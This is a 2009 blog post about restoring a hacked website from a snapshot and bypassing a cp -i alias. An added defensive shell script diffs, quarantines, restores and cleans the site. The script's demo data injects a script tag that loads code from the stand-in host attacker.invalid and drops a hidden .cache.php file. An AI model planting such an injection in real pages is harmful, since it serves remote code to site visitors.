Site restoration
by Mark on May 27, 2009, under general
Once again I was notified that ask-mark.com was triggering virus/malware alerts for visitors. My preliminary investigation at work showed that I had some sort of script injected into my files again. Unfortunately, I couldn’t get cygwin and ssh to connect to my host through the proxy server.
When I got home, I connected to my host and poked around, investigating how my site got hacked again. Not finding any obvious evidence other than file modify dates from yesterday, I decided to restore from one of my snapshots. I found that a snapshot from last week was not affected by whatever hacked my site. I wanted to restore the snapshot without first deleting the entire contents of my site. So, I tried using cp -rf ..., but I found that I was still being prompted to overwrite files. A little searching, and I found that my .bashrc file had an alias, cp='cp -i', so that it always ran in interactive mode. Commenting out that alias prevented the overwrite prompts, and now my site is back. I went back and restored the alias to ensure I don’t accidentally overwrite a critical folder in the future.
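As an added example (my own illustration, not Mark's script or anything from his site), here is the restore described above done as a small POSIX shell script, without editing .bashrc at all. It first lists which live files differ from the known-good snapshot by comparing contents rather than trusting modify dates, copies those suspect files aside for later analysis, copies the snapshot over the top with `command cp` (which, like `\cp`, bypasses a `cp -i` alias), and then shows the catch with an in-place copy: files the attacker added are not removed by it and have to be found and deleted separately. The directory layout, the "injected" script tag and the dropped file are all constructed demo data in a temporary directory; point `snap` and `live` at real trees to use it.

```shell
#!/bin/sh
# Added example, not from the original post. Paths and the "infected" files are
# constructed demo data in a temp directory; point SNAP/LIVE at real trees to use it.

# Files in LIVE that are missing from SNAP or differ from it (content comparison,
# which is more reliable than mtimes, since an attacker can reset those with touch).
list_changes() {
  snap=$1; live=$2
  ( cd "$live" && find . -type f ) | sed 's|^\./||' | sort |
  while IFS= read -r f; do
    if [ ! -e "$snap/$f" ] || ! cmp -s "$snap/$f" "$live/$f"; then
      printf '%s\n' "$f"
    fi
  done
}

# Keep copies of the suspect files (timestamps preserved) before overwriting them.
quarantine_changes() {
  snap=$1; live=$2; quar=$3
  list_changes "$snap" "$live" | while IFS= read -r f; do
    mkdir -p "$quar/$(dirname "$f")"
    command cp -p "$live/$f" "$quar/$f"
  done
}

# Copy the snapshot over the live tree in place. 'command cp' (like \cp) skips any
# shell alias such as cp='cp -i', so there is no per-file prompt and no need to edit
# .bashrc; -R recurses, -f forces, and "$snap/." copies the contents, not the dir.
restore_snapshot() {
  snap=$1; live=$2
  command cp -Rf "$snap/." "$live/"
}

# Caveat: copying over the top restores modified files but does not delete files
# the attacker added. After the restore, anything list_changes still reports is
# such a leftover; remove it (it was already quarantined above).
remove_leftovers() {
  snap=$1; live=$2
  list_changes "$snap" "$live" | while IFS= read -r f; do
    [ -e "$snap/$f" ] || rm -f "$live/$f"
  done
}

# Build a constructed snapshot/live pair: one file with an injected script tag,
# one hidden file dropped by the "attacker". Prints the work directory.
make_demo() {
  work=$(mktemp -d)
  mkdir -p "$work/snapshot/css" "$work/public_html"
  printf '<html><body>hello</body></html>\n' > "$work/snapshot/index.html"
  printf 'body { margin: 0 }\n' > "$work/snapshot/css/site.css"
  command cp -Rp "$work/snapshot/." "$work/public_html/"
  printf '<script src="http://attacker.invalid/x.js"></script>\n' >> "$work/public_html/index.html"
  printf 'dropped file\n' > "$work/public_html/css/.cache.php"
  printf '%s\n' "$work"
}

# Usage, in the order a restore should run:
#   W=$(make_demo)
#   list_changes "$W/snapshot" "$W/public_html"      # css/.cache.php and index.html
#   quarantine_changes "$W/snapshot" "$W/public_html" "$W/quarantine"
#   restore_snapshot "$W/snapshot" "$W/public_html"
#   list_changes "$W/snapshot" "$W/public_html"      # only css/.cache.php remains
#   remove_leftovers "$W/snapshot" "$W/public_html"
```

Two notes on the alias itself. Bash does not expand aliases in a non-interactive script unless `shopt -s expand_aliases` is set, so the prompts only bit because `cp -rf` was typed at the interactive shell; typing `\cp -rf` or `command cp -rf` there would have had the same effect as commenting out the alias, and the alias can stay in .bashrc as the safety net it was meant to be. The quarantine step matters because the overwritten copies are the only evidence of what was injected; once the restore runs, that is gone from the live tree.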
I just found out that the website for another organization with which I work is facing a similar hack. Does anyone know how all of these websites are getting hacked? Are the CMS packages (WordPress, .NET Nuke) insecure? Or are hackers gaining access some other way?
Also, never underestimate the usefulness of backups.